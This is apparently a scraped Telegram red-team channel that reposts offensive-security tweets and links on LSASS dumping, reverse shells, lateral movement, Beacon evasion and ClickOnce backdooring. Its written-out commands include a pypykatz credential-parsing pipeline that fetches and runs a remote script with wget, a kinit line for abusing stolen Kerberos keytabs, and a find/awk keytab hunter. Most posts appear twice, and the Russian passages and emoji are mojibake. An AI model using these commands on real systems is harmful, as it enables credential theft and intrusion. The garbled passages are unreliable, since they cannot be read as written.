π [ k_sec, Kurt Baumgartner ]
we go deeper yet into OpTriangulation...
π https://securelist.com/triangledb-triangulation-implant/110050/
funny thing, it reminds me of a simple string xor decoder that i wrote for purple lambert research a few years ago.
course, many malware families use the same obfuscation...
we go deeper yet into OpTriangulation...
π https://securelist.com/triangledb-triangulation-implant/110050/
funny thing, it reminds me of a simple string xor decoder that i wrote for purple lambert research a few years ago.
course, many malware families use the same obfuscation...
#include <stdio.h>π₯ [ tweet ]
#include <string.h>
int main(int argc, const char* argv[]){
unsigned int i=0;
unsigned char c1, c2, x1;
const int s1[] = {0x76, 0x18, 0x6C, 0x08, 0x64, 0x08, 0x00}; //obfuscated string value here
const int *s2 = malloc(sizeof(s1));
memcpy(s2,s1,sizeof(s1));
// simple xor between current and next value
while (s2[i+1] != '\0') {
c1 = (unsigned char) s1[i];
c2 = (unsigned char) s2[i+1];
x1 = c1 ^ c2;
printf("%c", x1);
i++;
}
printf("\n");
return 0;
}
π2π1
π [ pfiatde, pfiatde ]
Command detection in Powershell is not easy.
Some words about an obfuscated LSASS dumper command via comsvcs.
Plus some ways to circumvent deletion of the dump.
π https://badoption.eu/blog/2023/06/21/dumpit.html
π https://github.com/powerseb/PowerExtract
π₯ [ tweet ]
Command detection in Powershell is not easy.
Some words about an obfuscated LSASS dumper command via comsvcs.
Plus some ways to circumvent deletion of the dump.
π https://badoption.eu/blog/2023/06/21/dumpit.html
π https://github.com/powerseb/PowerExtract
π₯ [ tweet ]
π1
π [ pdnuclei, nuclei ]
If you're not writing custom Nuclei templates, you're missing out! π’
βοΈ In this blog post, we explore the power of nuclei custom templates and how creating your own is beneficial for users!
Don't miss out, read this π
π https://blog.projectdiscovery.io/if-youre-not-writing-custom-nuclei-templates-youre-missing-out/
π₯ [ tweet ]
If you're not writing custom Nuclei templates, you're missing out! π’
βοΈ In this blog post, we explore the power of nuclei custom templates and how creating your own is beneficial for users!
Don't miss out, read this π
π https://blog.projectdiscovery.io/if-youre-not-writing-custom-nuclei-templates-youre-missing-out/
π₯ [ tweet ]
π [ R0h1rr1m, Furkan GΓΆksel ]
I developed a Fileless Lateral Movement tool called NimExec. It changes service configuration to execute the payload via manually crafted RPC packets. It's the improved version of @JulioUrena 's SharpNoPSExec with Pass the Hash support. Enjoy!
#infosec
https://t.co/G6xeyHVmnf
π https://github.com/frkngksl/NimExec
π₯ [ tweet ]
I developed a Fileless Lateral Movement tool called NimExec. It changes service configuration to execute the payload via manually crafted RPC packets. It's the improved version of @JulioUrena 's SharpNoPSExec with Pass the Hash support. Enjoy!
#infosec
https://t.co/G6xeyHVmnf
π https://github.com/frkngksl/NimExec
π₯ [ tweet ]
π [ BlWasp_, BlackWasp ]
New tool in Rust. To learn this langage, and the basics of Windows internals, I have coded a TLS over TCP reverse shell with advanced integrated features like load a PE or a shellcode, download/upload files, bypass the AMSI, or autopwn the world...
https://t.co/DQShWQbeRw
π https://github.com/BlWasp/rs-shell
π₯ [ tweet ]
New tool in Rust. To learn this langage, and the basics of Windows internals, I have coded a TLS over TCP reverse shell with advanced integrated features like load a PE or a shellcode, download/upload files, bypass the AMSI, or autopwn the world...
https://t.co/DQShWQbeRw
π https://github.com/BlWasp/rs-shell
π₯ [ tweet ]
https://github.com/BlWasp/rs-shell/blob/main/src/autopwn.rs πΏThis media is not supported in your browser
VIEW IN TELEGRAM
π [ 0gtweet, Grzegorz Tworek ]
Netsh.exe relies on extensions taken from Registry, which means it may be used as a persistence.
And what, if you go one step further, extending netsh with a DLL allowing you to do whatever you want? Kinda #LOLBin π
Enjoy the C code and DLL, as usual: https://t.co/xfm1Mxaf4F
π https://github.com/gtworek/PSBits/tree/master/NetShRun
π₯ [ tweet ]
Netsh.exe relies on extensions taken from Registry, which means it may be used as a persistence.
And what, if you go one step further, extending netsh with a DLL allowing you to do whatever you want? Kinda #LOLBin π
Enjoy the C code and DLL, as usual: https://t.co/xfm1Mxaf4F
π https://github.com/gtworek/PSBits/tree/master/NetShRun
π₯ [ tweet ]
π4
ΠΠ΅ΠΌΠ½ΠΎΠ³ΠΎ ΠΊΠΎΠ΄Π³ΠΎΠ»ΡΡΠ° Π΄Π»Ρ ΠΏΠ°ΡΡΠΈΠ½Π³Π° Π²ΡΠ²ΠΎΠ΄Π° pypykatz π€ͺ
π https://gist.github.com/snovvcrash/d77a3ea5401498da95e1fab840122bea
pypykatz lsa minidump lsass.dmp 2>/dev/null | python3 <(wget -qO- https://gist.github.com/snovvcrash/d77a3ea5401498da95e1fab840122bea/raw/554b5621eed33be158c1583a17d50448964cefa8/pypyparse.py)
π https://gist.github.com/snovvcrash/d77a3ea5401498da95e1fab840122bea
π4π3π₯±1
π [ HakaiOffsec, Hakai Offsec ]
After some hard work, coffee has been released! Our newest Rust COFF Loader!
If you want to check it out:
Donβt forget to check our blog post for more details:
π https://github.com/hakaioffsec/coffee
π https://labs.hakaioffsec.com/coffee-a-coff-loader-made-in-rust/
π₯ [ tweet ]
After some hard work, coffee has been released! Our newest Rust COFF Loader!
If you want to check it out:
Donβt forget to check our blog post for more details:
π https://github.com/hakaioffsec/coffee
π https://labs.hakaioffsec.com/coffee-a-coff-loader-made-in-rust/
π₯ [ tweet ]
π1
Forwarded from RedTeam brazzers (ΠΠΈΡΠ°)
ΠΡΠ°ΠΆΠ° KeyTab.
ΠΠΎ Π²ΡΠ΅ΠΌΡ ΡΠ΅ΡΡΠΈΡΠΎΠ²Π°Π½ΠΈΡ Π½Π° ΠΏΡΠΎΠ½ΠΈΠΊΠ½ΠΎΠ²Π΅Π½ΠΈΠ΅ ΡΠ°ΡΡΠΎ Π²ΡΡΡΠ΅ΡΠ°ΡΡΡΡ ΡΠΈΡΡΠ΅ΠΌΡ Linux Ρ Π½Π°ΡΡΡΠΎΠ΅Π½Π½ΡΠΌ Keytab. Keytab Ρ ΡΠ°Π½ΠΈΡ ΠΏΠ°ΡΡ ΠΏΡΠΈΠ½ΡΠΈΠΏΠ°Π»Π° ΠΊΠ΅ΡΠ±Π΅ΡΠΎΡΠ° ΠΈ Π΅Π³ΠΎ Π·Π°ΡΠΈΡΡΠΎΠ²Π°Π½Π½ΡΡ ΠΊΠ»ΡΡΠ΅ΠΉ. Π‘ ΠΏΠΎΠΌΠΎΡΡΡ ΡΡΠΈΡ Π·Π°ΡΠΈΡΡΠΎΠ²Π°Π½Π½ΡΡ ΠΊΠ»ΡΡΠ΅ΠΉ ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΎΠ»ΡΡΠΈΡΡ TGT. Π ΡΠ΅Π·ΡΠ»ΡΡΠ°ΡΠ΅ ΡΠ΅Π³ΠΎ ΠΏΠΎΡΠ²Π»ΡΠ΅ΡΡΡ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡΡ Π·Π°ΠΏΡΠΎΡΠΈΡΡ TGT Π½Π° ΠΈΠΌΡ ΠΏΡΠΈΠ½ΡΠΈΠΏΠ°Π»Π° Π±Π΅Π· Π²Π²ΠΎΠ΄Π° ΠΏΠ°ΡΠΎΠ»Ρ. Kerberos Π½Π° Linux ΡΠΆΠ΅ Π΄Π°Π»Π΅ΠΊΠΎ Π½Π΅ ΡΠ΅Π΄ΠΊΠΎΡΡΡ - Π³Π΅ΡΠ΅ΡΠΎΠ³Π΅Π½Π½ΡΠ΅ ΡΠ΅ΡΠΈ ΡΡΠ°Π½ΠΎΠ²ΡΡΡΡ Π²ΡΠ΅ Π±ΠΎΠ»Π΅Π΅ ΠΏΠΎΠΏΡΠ»ΡΡΠ½ΡΠΌΠΈ ΠΏΠΎ ΡΡΠ΄Ρ ΠΏΡΠΈΡΠΈΠ½. ΠΠ°ΠΏΡΠΈΠΌΠ΅Ρ, ΠΌΠΎΠΆΠ΅Ρ Π±ΡΡΡ ΡΠ°ΠΊΠΎΠΉ ΡΡΠ΅Π½Π°ΡΠΈΠΉ, ΡΡΠΎ Π½Π° Linux Π±Π΅ΠΊΠ°ΠΏΠΈΡΡΡ ΡΠΎΠ΄Π΅ΡΠΆΠΈΠΌΠΎΠ΅ ΠΊΠ°ΠΊΠΎΠΉ-Π»ΠΈΠ±ΠΎ ΡΠ°ΡΡ, ΠΏΡΠΈ ΡΡΠΎΠΌ ΠΏΠΎΠ»ΡΡΠΈΡΡ Π΄ΠΎΡΡΡΠΏ ΠΊ ΡΡΠΎΠΉ ΡΠ°ΡΠ΅ ΠΌΠΎΠ³ΡΡ ΡΠΎΠ»ΡΠΊΠΎ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»ΠΈ Π΄ΠΎΠΌΠ΅Π½Π°. Π ΡΠ°ΠΊΠΎΠΌ ΡΠ»ΡΡΠ°Π΅ ΠΏΠΈΡΠ΅ΡΡΡ ΠΏΡΠΎΡΡΠ΅Π½ΡΠΊΠΈΠΉ ΡΠΊΡΠΈΠΏΡ Π½Π° Π±Π°Ρ, Π² ΠΊΠΎΡΠΎΡΠΎΠΌ ΡΠ΅Π°Π»ΠΈΠ·ΡΠ΅ΡΡΡ Π»ΠΎΠ³ΠΈΠΊΠ° ΠΏΠΎ Π·Π°ΠΏΡΠΎΡΡ TGT ΡΠΈΠΊΠ΅ΡΠ° Π½Π° ΠΎΡΠ½ΠΎΠ²Π΅ KeyTab, Π° Π·Π°ΡΠ΅ΠΌ ΠΊΠΎΠΏΠΈΡΠΎΠ²Π°Π½ΠΈΡ ΡΠ°ΠΉΠ»ΠΎΠ² Ρ ΡΠ°ΡΡ. ΠΡΠΈΡΠ΅ΠΌ Π΄Π»Ρ ΠΏΠ΅ΡΠΈΠΎΠ΄ΠΈΡΠ½ΠΎΡΡΠΈ Π·Π°ΠΏΡΡΠΊΠ° ΡΠΊΡΠΈΠΏΡ Π΄ΠΎΠ±Π°Π²Π»ΡΠ΅ΡΡΡ Π² crontab.
ΠΠ°ΠΌ, ΠΊΠ°ΠΊ Π°ΡΠ°ΠΊΡΡΡΠΈΠΌ, ΠΊΠΎΠ½Π΅ΡΠ½ΠΎ ΠΆΠ΅, ΠΈΠ½ΡΠ΅ΡΠ΅ΡΠ΅Π½ ΠΏΡΠΎΡΠ΅ΡΡ Π·Π°ΠΏΡΠΎΡΠ° TGT Π±ΠΈΠ»Π΅ΡΠ° Π½Π° ΠΎΡΠ½ΠΎΠ²Π΅ KeyTab. ΠΠ»Ρ ΡΡΠΎΠ³ΠΎ ΠΌΠΎΠΆΠ½ΠΎ ΠΈΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΡ ΠΊΠΎΠΌΠ°Π½Π΄Ρ kinit ΡΠΎ ΡΠ»Π΅Π΄ΡΡΡΠΈΠΌ ΡΠΈΠ½ΡΠ°ΠΊΡΠΈΡΠΎΠΌ:
ΠΡΡΠ°Π΅ΡΡΡ Π»ΠΈΡΡ ΠΎΠ΄Π½Π° ΠΏΡΠΎΠ±Π»Π΅ΠΌΠ° - ΠΎΠ±Π½Π°ΡΡΠΆΠ΅Π½ΠΈΠ΅ ΡΠ°ΠΌΠΈΡ KeyTab ΡΠ°ΠΉΠ»ΠΎΠ². ΠΠΎΠ½Π΅ΡΠ½ΠΎ, ΠΌΠΎΠΆΠ½ΠΎ ΡΡΡΠΊΠ°ΠΌΠΈ ΡΠ΅ΡΠ΅Π· find ΠΈΡΠΊΠ°ΡΡ ΡΡΠΈ ΡΠ°ΠΉΠ»Ρ, ΠΏΠΎΡΠΎΠΌ ΡΠ°ΠΊΠΆΠ΅ ΠΌΡΡΠΎΡΠ½ΠΎ ΠΏΡΠΎΠ²Π΅ΡΡΡΡ ΡΠ°Π·ΡΠ΅ΡΠ΅Π½ΠΈΡ Π½Π° Π½ΠΈΡ , ΡΡΠΎ Π½Π΅ Π΅ΡΡΡ Ρ ΠΎΡΠΎΡΠΎ. ΠΠΎΡΡΠΎΠΌΡ Ρ Π½Π°ΠΊΠ°Π»ΡΠΊΠ°Π» ΡΠ»Π΅Π΄ΡΡΡΠΈΠΉ ΠΊΠΎΠΌΠ°Π½Π΄Π»Π΅Ρ, ΠΊΠΎΡΠΎΡΡΠΉ Π°Π²ΡΠΎΠΌΠ°ΡΠΈΡΠ΅ΡΠΊΠΈ Π½Π°ΠΉΠ΄Π΅Ρ Π²ΡΠ΅
1. ΠΠ΅Π»Π΅Π½ΡΠΌ ΠΏΠΎΠ΄ΡΠ²Π΅ΡΠΈΠ²Π°ΡΡΡΡ ΡΠ΅ ΡΠ°ΠΉΠ»Ρ, ΠΊΠΎΡΠΎΡΡΠ΅ ΠΏΡΠΈΠ½Π°Π΄Π»Π΅ΠΆΠ°Ρ ΡΠ΅ΠΊΡΡΠ΅ΠΌΡ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ.
2. ΠΠ΅Π»ΡΡΠΌ ΠΏΠΎΠ΄ΡΠ²Π΅ΡΠΈΠ²Π°ΡΡΡΡ ΡΠ΅ ΡΠ°ΠΉΠ»Ρ, ΠΊΠΎΡΠΎΡΡΠ΅ ΠΏΡΠΈΠ½Π°Π΄Π»Π΅ΠΆΠ°Ρ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ, ΠΎΡΠ»ΠΈΡΠ½ΠΎΠΌΡ ΠΎΡ ΡΠ΅ΠΊΡΡΠ΅Π³ΠΎ, ΠΏΡΠΈ ΡΡΠΎΠΌ ΡΠ΅ΠΊΡΡΠΈΠΉ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ Π½Π΅ ΠΈΠΌΠ΅Π΅Ρ Π΄ΠΎΡΡΠ°ΡΠΎΡΠ½ΡΡ ΠΏΡΠ°Π² (ΡΡΠ΅Π½ΠΈΠ΅/Π·Π°ΠΏΠΈΡΡ) Π½Π° ΡΡΠΎΡ ΡΠ°ΠΌΡΠΉ KeyTab.
3. ΠΠ°ΠΊΠΎΠ½Π΅Ρ, ΠΊΡΠ°ΡΠ½ΡΠΌ ΠΏΠΎΠ΄ΡΠ²Π΅ΡΠΈΠ²Π°ΡΡΡΡ ΡΠ°ΠΉΠ»Ρ, ΠΊΠΎΡΠΎΡΡΠ΅ ΠΏΡΠΈΠ½Π°Π΄Π»Π΅ΠΆΠ°Ρ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ, ΠΎΡΠ»ΠΈΡΠ½ΠΎΠΌΡ ΠΎΡ ΡΠ΅ΠΊΡΡΠ΅Π³ΠΎ, ΠΏΡΠΈ ΡΡΠΎΠΌ ΡΠ΅ΠΊΡΡΠΈΠΉ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ ΠΈΠΌΠ΅Π΅Ρ Π΄ΠΎΡΡΠ°ΡΠΎΡΠ½ΡΠ΅ ΠΏΡΠ°Π²Π° Π½Π° ΡΡΠΎΡ ΡΠ°ΠΌΡΠΉ KeyTab.
ΠΠΎ Π²ΡΠ΅ΠΌΡ ΡΠ΅ΡΡΠΈΡΠΎΠ²Π°Π½ΠΈΡ Π½Π° ΠΏΡΠΎΠ½ΠΈΠΊΠ½ΠΎΠ²Π΅Π½ΠΈΠ΅ ΡΠ°ΡΡΠΎ Π²ΡΡΡΠ΅ΡΠ°ΡΡΡΡ ΡΠΈΡΡΠ΅ΠΌΡ Linux Ρ Π½Π°ΡΡΡΠΎΠ΅Π½Π½ΡΠΌ Keytab. Keytab Ρ ΡΠ°Π½ΠΈΡ ΠΏΠ°ΡΡ ΠΏΡΠΈΠ½ΡΠΈΠΏΠ°Π»Π° ΠΊΠ΅ΡΠ±Π΅ΡΠΎΡΠ° ΠΈ Π΅Π³ΠΎ Π·Π°ΡΠΈΡΡΠΎΠ²Π°Π½Π½ΡΡ ΠΊΠ»ΡΡΠ΅ΠΉ. Π‘ ΠΏΠΎΠΌΠΎΡΡΡ ΡΡΠΈΡ Π·Π°ΡΠΈΡΡΠΎΠ²Π°Π½Π½ΡΡ ΠΊΠ»ΡΡΠ΅ΠΉ ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΎΠ»ΡΡΠΈΡΡ TGT. Π ΡΠ΅Π·ΡΠ»ΡΡΠ°ΡΠ΅ ΡΠ΅Π³ΠΎ ΠΏΠΎΡΠ²Π»ΡΠ΅ΡΡΡ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡΡ Π·Π°ΠΏΡΠΎΡΠΈΡΡ TGT Π½Π° ΠΈΠΌΡ ΠΏΡΠΈΠ½ΡΠΈΠΏΠ°Π»Π° Π±Π΅Π· Π²Π²ΠΎΠ΄Π° ΠΏΠ°ΡΠΎΠ»Ρ. Kerberos Π½Π° Linux ΡΠΆΠ΅ Π΄Π°Π»Π΅ΠΊΠΎ Π½Π΅ ΡΠ΅Π΄ΠΊΠΎΡΡΡ - Π³Π΅ΡΠ΅ΡΠΎΠ³Π΅Π½Π½ΡΠ΅ ΡΠ΅ΡΠΈ ΡΡΠ°Π½ΠΎΠ²ΡΡΡΡ Π²ΡΠ΅ Π±ΠΎΠ»Π΅Π΅ ΠΏΠΎΠΏΡΠ»ΡΡΠ½ΡΠΌΠΈ ΠΏΠΎ ΡΡΠ΄Ρ ΠΏΡΠΈΡΠΈΠ½. ΠΠ°ΠΏΡΠΈΠΌΠ΅Ρ, ΠΌΠΎΠΆΠ΅Ρ Π±ΡΡΡ ΡΠ°ΠΊΠΎΠΉ ΡΡΠ΅Π½Π°ΡΠΈΠΉ, ΡΡΠΎ Π½Π° Linux Π±Π΅ΠΊΠ°ΠΏΠΈΡΡΡ ΡΠΎΠ΄Π΅ΡΠΆΠΈΠΌΠΎΠ΅ ΠΊΠ°ΠΊΠΎΠΉ-Π»ΠΈΠ±ΠΎ ΡΠ°ΡΡ, ΠΏΡΠΈ ΡΡΠΎΠΌ ΠΏΠΎΠ»ΡΡΠΈΡΡ Π΄ΠΎΡΡΡΠΏ ΠΊ ΡΡΠΎΠΉ ΡΠ°ΡΠ΅ ΠΌΠΎΠ³ΡΡ ΡΠΎΠ»ΡΠΊΠΎ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»ΠΈ Π΄ΠΎΠΌΠ΅Π½Π°. Π ΡΠ°ΠΊΠΎΠΌ ΡΠ»ΡΡΠ°Π΅ ΠΏΠΈΡΠ΅ΡΡΡ ΠΏΡΠΎΡΡΠ΅Π½ΡΠΊΠΈΠΉ ΡΠΊΡΠΈΠΏΡ Π½Π° Π±Π°Ρ, Π² ΠΊΠΎΡΠΎΡΠΎΠΌ ΡΠ΅Π°Π»ΠΈΠ·ΡΠ΅ΡΡΡ Π»ΠΎΠ³ΠΈΠΊΠ° ΠΏΠΎ Π·Π°ΠΏΡΠΎΡΡ TGT ΡΠΈΠΊΠ΅ΡΠ° Π½Π° ΠΎΡΠ½ΠΎΠ²Π΅ KeyTab, Π° Π·Π°ΡΠ΅ΠΌ ΠΊΠΎΠΏΠΈΡΠΎΠ²Π°Π½ΠΈΡ ΡΠ°ΠΉΠ»ΠΎΠ² Ρ ΡΠ°ΡΡ. ΠΡΠΈΡΠ΅ΠΌ Π΄Π»Ρ ΠΏΠ΅ΡΠΈΠΎΠ΄ΠΈΡΠ½ΠΎΡΡΠΈ Π·Π°ΠΏΡΡΠΊΠ° ΡΠΊΡΠΈΠΏΡ Π΄ΠΎΠ±Π°Π²Π»ΡΠ΅ΡΡΡ Π² crontab.
ΠΠ°ΠΌ, ΠΊΠ°ΠΊ Π°ΡΠ°ΠΊΡΡΡΠΈΠΌ, ΠΊΠΎΠ½Π΅ΡΠ½ΠΎ ΠΆΠ΅, ΠΈΠ½ΡΠ΅ΡΠ΅ΡΠ΅Π½ ΠΏΡΠΎΡΠ΅ΡΡ Π·Π°ΠΏΡΠΎΡΠ° TGT Π±ΠΈΠ»Π΅ΡΠ° Π½Π° ΠΎΡΠ½ΠΎΠ²Π΅ KeyTab. ΠΠ»Ρ ΡΡΠΎΠ³ΠΎ ΠΌΠΎΠΆΠ½ΠΎ ΠΈΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΡ ΠΊΠΎΠΌΠ°Π½Π΄Ρ kinit ΡΠΎ ΡΠ»Π΅Π΄ΡΡΡΠΈΠΌ ΡΠΈΠ½ΡΠ°ΠΊΡΠΈΡΠΎΠΌ:
kinit βkt <keytab> <ΠΏΡΠΈΠ½ΡΠΈΠΏΠ°Π»>
ΠΠ°ΠΏΡΠΈΠΌΠ΅Ρ, Π΅ΡΠ»ΠΈ ΡΠ°ΠΉΠ» /tmp/admin.keytab ΡΠ»ΡΠΆΠΈΡ Π΄Π»Ρ Π°ΡΡΠ΅Π½ΡΠΈΡΠΈΠΊΠ°ΡΠΈΠΈ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ admin@OFFICE.LOCAL , ΡΠΎ Π΄Π΅Π»Π°Π΅ΠΌ Π²ΠΎΡ ΡΠ°ΠΊ:kinit -kt /tmp/admin.keytab admin@OFFICE.LOCAL ΠΡΡΠ°Π΅ΡΡΡ Π»ΠΈΡΡ ΠΎΠ΄Π½Π° ΠΏΡΠΎΠ±Π»Π΅ΠΌΠ° - ΠΎΠ±Π½Π°ΡΡΠΆΠ΅Π½ΠΈΠ΅ ΡΠ°ΠΌΠΈΡ KeyTab ΡΠ°ΠΉΠ»ΠΎΠ². ΠΠΎΠ½Π΅ΡΠ½ΠΎ, ΠΌΠΎΠΆΠ½ΠΎ ΡΡΡΠΊΠ°ΠΌΠΈ ΡΠ΅ΡΠ΅Π· find ΠΈΡΠΊΠ°ΡΡ ΡΡΠΈ ΡΠ°ΠΉΠ»Ρ, ΠΏΠΎΡΠΎΠΌ ΡΠ°ΠΊΠΆΠ΅ ΠΌΡΡΠΎΡΠ½ΠΎ ΠΏΡΠΎΠ²Π΅ΡΡΡΡ ΡΠ°Π·ΡΠ΅ΡΠ΅Π½ΠΈΡ Π½Π° Π½ΠΈΡ , ΡΡΠΎ Π½Π΅ Π΅ΡΡΡ Ρ ΠΎΡΠΎΡΠΎ. ΠΠΎΡΡΠΎΠΌΡ Ρ Π½Π°ΠΊΠ°Π»ΡΠΊΠ°Π» ΡΠ»Π΅Π΄ΡΡΡΠΈΠΉ ΠΊΠΎΠΌΠ°Π½Π΄Π»Π΅Ρ, ΠΊΠΎΡΠΎΡΡΠΉ Π°Π²ΡΠΎΠΌΠ°ΡΠΈΡΠ΅ΡΠΊΠΈ Π½Π°ΠΉΠ΄Π΅Ρ Π²ΡΠ΅
.keytab ΡΠ°ΠΉΠ»Ρ , Π° Π·Π°ΡΠ΅ΠΌ ΠΏΠΎΠ΄ΡΠ²Π΅ΡΠΈΡ ΠΈΠ½ΡΠ΅ΡΠ΅ΡΠ½ΡΠ΅ ΡΠ°Π·Π½ΡΠΌΠΈ ΡΠ²Π΅ΡΠ°ΠΌΠΈ:1. ΠΠ΅Π»Π΅Π½ΡΠΌ ΠΏΠΎΠ΄ΡΠ²Π΅ΡΠΈΠ²Π°ΡΡΡΡ ΡΠ΅ ΡΠ°ΠΉΠ»Ρ, ΠΊΠΎΡΠΎΡΡΠ΅ ΠΏΡΠΈΠ½Π°Π΄Π»Π΅ΠΆΠ°Ρ ΡΠ΅ΠΊΡΡΠ΅ΠΌΡ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ.
2. ΠΠ΅Π»ΡΡΠΌ ΠΏΠΎΠ΄ΡΠ²Π΅ΡΠΈΠ²Π°ΡΡΡΡ ΡΠ΅ ΡΠ°ΠΉΠ»Ρ, ΠΊΠΎΡΠΎΡΡΠ΅ ΠΏΡΠΈΠ½Π°Π΄Π»Π΅ΠΆΠ°Ρ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ, ΠΎΡΠ»ΠΈΡΠ½ΠΎΠΌΡ ΠΎΡ ΡΠ΅ΠΊΡΡΠ΅Π³ΠΎ, ΠΏΡΠΈ ΡΡΠΎΠΌ ΡΠ΅ΠΊΡΡΠΈΠΉ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ Π½Π΅ ΠΈΠΌΠ΅Π΅Ρ Π΄ΠΎΡΡΠ°ΡΠΎΡΠ½ΡΡ ΠΏΡΠ°Π² (ΡΡΠ΅Π½ΠΈΠ΅/Π·Π°ΠΏΠΈΡΡ) Π½Π° ΡΡΠΎΡ ΡΠ°ΠΌΡΠΉ KeyTab.
3. ΠΠ°ΠΊΠΎΠ½Π΅Ρ, ΠΊΡΠ°ΡΠ½ΡΠΌ ΠΏΠΎΠ΄ΡΠ²Π΅ΡΠΈΠ²Π°ΡΡΡΡ ΡΠ°ΠΉΠ»Ρ, ΠΊΠΎΡΠΎΡΡΠ΅ ΠΏΡΠΈΠ½Π°Π΄Π»Π΅ΠΆΠ°Ρ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ, ΠΎΡΠ»ΠΈΡΠ½ΠΎΠΌΡ ΠΎΡ ΡΠ΅ΠΊΡΡΠ΅Π³ΠΎ, ΠΏΡΠΈ ΡΡΠΎΠΌ ΡΠ΅ΠΊΡΡΠΈΠΉ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ ΠΈΠΌΠ΅Π΅Ρ Π΄ΠΎΡΡΠ°ΡΠΎΡΠ½ΡΠ΅ ΠΏΡΠ°Π²Π° Π½Π° ΡΡΠΎΡ ΡΠ°ΠΌΡΠΉ KeyTab.
find / -iname '*.keytab' -type f -exec ls -l {} \; 2>/dev/null | awk -v user="$(whoami)" 'BEGIN { FS = OFS = " "; red = "\033[31m"; yellow = "\033[33m"; green = "\033[32m"; reset = "\033[0m" } { if ($3 == user && $9 ~ /.keytab$/) { printf green } else if ($3 != user && $9 ~ /.keytab$/ && $1 ~ /^-.w.r../) { printf red } else if ($3 != user && $9 ~ /.keytab$/ && ($1 !~ /^.w.r../ || $1 !~ /^-.w../)) { printf yellow } print $0; printf reset }'π₯5π1
π [ stephenfewer, Stephen Fewer ]
Last Friday's @metasploit release adds coverage for CVE-2023-34362 in MOVEit Transfer, great work by @tychos_moose, @iagox86, @_CField and team. Nice to see the new fetch payloads in action tooπ₯Check out the release here:
π https://www.rapid7.com/blog/post/2023/06/23/metasploit-weekly-wrap-up-16/
π₯ [ tweet ]
Last Friday's @metasploit release adds coverage for CVE-2023-34362 in MOVEit Transfer, great work by @tychos_moose, @iagox86, @_CField and team. Nice to see the new fetch payloads in action tooπ₯Check out the release here:
π https://www.rapid7.com/blog/post/2023/06/23/metasploit-weekly-wrap-up-16/
π₯ [ tweet ]
π2π₯1
π [ mpgn_x64, mpgn ]
3, 2, 1 CrackMapExec 6.0.0 is now public ! π
So much new features and fix that I've made a blogpost for it βΆοΈ
Special thanks to @_zblurx @MJHallenbeck & @al3x_n3ff for their indefectible support & contributions ! π»
π https://wiki.porchetta.industries/news/a-new-home
π₯ [ tweet ]
3, 2, 1 CrackMapExec 6.0.0 is now public ! π
So much new features and fix that I've made a blogpost for it βΆοΈ
Special thanks to @_zblurx @MJHallenbeck & @al3x_n3ff for their indefectible support & contributions ! π»
π https://wiki.porchetta.industries/news/a-new-home
π₯ [ tweet ]
π2π₯2
π [ kleiton0x7e, Kleiton Kurti ]
Came up with an improved version of WMIExec. By leveraging the Win32_ScheduledJob class, we can remotely create scheduled jobs. This way it's not required anymore to rely on port 139 and 445.
Github:
#CyberSecurity #redteam #infosec #infosecurity
π https://github.com/WKL-Sec/wmiexec/
π₯ [ tweet ]
Came up with an improved version of WMIExec. By leveraging the Win32_ScheduledJob class, we can remotely create scheduled jobs. This way it's not required anymore to rely on port 139 and 445.
Github:
#CyberSecurity #redteam #infosec #infosecurity
π https://github.com/WKL-Sec/wmiexec/
π₯ [ tweet ]
π₯3
π [ passthehashbrwn, Josh ]
Just published a new blog post covering how to hide Beacon during BOF execution. If your BOF triggers a memory scan then EDR is likely to find Beacon and kill your process, but we can mask it using a simple technique.
π https://securityintelligence.com/posts/how-to-hide-beacon-during-bof-execution/
π https://github.com/xforcered/bofmask
π₯ [ tweet ]
Just published a new blog post covering how to hide Beacon during BOF execution. If your BOF triggers a memory scan then EDR is likely to find Beacon and kill your process, but we can mask it using a simple technique.
π https://securityintelligence.com/posts/how-to-hide-beacon-during-bof-execution/
π https://github.com/xforcered/bofmask
π₯ [ tweet ]
π₯3
This media is not supported in your browser
VIEW IN TELEGRAM
π [ an0n_r0, an0n ]
Just recreated this awesome @SpecterOps (@zyn3rgy, @0xthirteen) technique for initial access by #backdooring a random #ClickOnce application with a Cobalt Strike stager. While I became a ClickOnce addictπ, compiled a short writeup about my journey:
π https://an0n-r0.medium.com/backdooring-clickonce-net-for-initial-access-a-practical-example-1eb6863c0579
π₯ [ tweet ][ quote ]
Just recreated this awesome @SpecterOps (@zyn3rgy, @0xthirteen) technique for initial access by #backdooring a random #ClickOnce application with a Cobalt Strike stager. While I became a ClickOnce addictπ, compiled a short writeup about my journey:
π https://an0n-r0.medium.com/backdooring-clickonce-net-for-initial-access-a-practical-example-1eb6863c0579
π₯ [ tweet ][ quote ]
π7
Forwarded from ΠΠΎΠ»ΠΎΡΠ°ΡΡΠΉ Π±ΡΠ±Π»ΠΈΠΊ
4 Π½ΠΎΠ²ΡΡ
Π²ΠΈΠ΄Π΅ΠΎ Π½Π° ΠΊΠ°Π½Π°Π»Π΅ SpecterOps
Security Distilled: Building a First-Principles Approach to Security
https://www.youtube.com/watch?v=zjJaYwqVHxY
A Taste of Kerberos Abuse
https://www.youtube.com/watch?v=9SUXifUp9ZY
The BloodHound 4.3 Release: Get Global Admin More Often
